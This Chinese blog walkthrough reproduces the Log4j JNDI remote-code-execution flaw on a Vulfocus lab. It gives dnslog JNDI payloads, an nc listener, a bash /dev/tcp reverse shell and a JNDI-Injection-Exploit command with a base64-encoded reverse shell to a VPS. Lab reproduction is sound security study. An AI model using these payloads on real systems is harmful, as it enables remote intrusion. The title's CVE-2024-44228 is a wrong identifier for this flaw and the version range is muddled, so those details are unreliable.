CVE-2024-44228——Vulfocus-Log4j RCE漏洞复现_vulfous中cve-2024-44228

+ [Vuofocus](#Vuofocus_40)
+ [Dnslog出网测试](#Dnslog_50)
+ [JNDI注入反弹shell](#JNDIshell_74)

漏洞描述

在这里插入图片描述
Apache Log4j2 是 Apache 软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的 重写,并且引入了大量丰富的特
性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能 而被广泛的应用于各种常见的 Web 服务中。

漏洞评级

Apache Log4j 远程代码执行漏洞 :严重

在这里插入图片描述

影响范围

https://fofa.so/static\_pages/log4j2

在这里插入图片描述
在这里插入图片描述

Apache log4j2 2.\* <= Apache log4j2 2.15.1.rc1

主流相关产品

Spring-Boot-strater-log4j2

Apache Struts2

Apache Solr

Apache Flink

Apache Druid

ElasticSearch

Vuofocus

http://vulfocus.fofa.so/

在这里插入图片描述
启动靶场
在这里插入图片描述
在这里插入图片描述

Dnslog出网测试

http://www.dnslog.cn/

payload GET方式提交
在这里插入图片描述

payload

payload=${jndi:ldap://X.X.X.X/exp}
payload=${jndi:ldap://5e0s0v.dnslog.cn/exp}

用payload打的时候发现服务器返回404
原因是因为GET数据传输要URL编码
*在这里插入图片描述*

在这里插入图片描述
URL编码后提交正常
在这里插入图片描述
DNSlog成功回显
在这里插入图片描述

JNDI注入反弹shell

JNDI

https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md

VPS监听端口

nc -lvp 7777

在这里插入图片描述
JNDI注入
在这里插入图片描述

替换JNDI中对应的payload
在这里插入图片描述
在这里插入图片描述

反弹shell

bash -i >& /dev/tcp/ip/port 0>&1

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"  -A   [vps ip]

反弹shell命令进行了base64编码

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值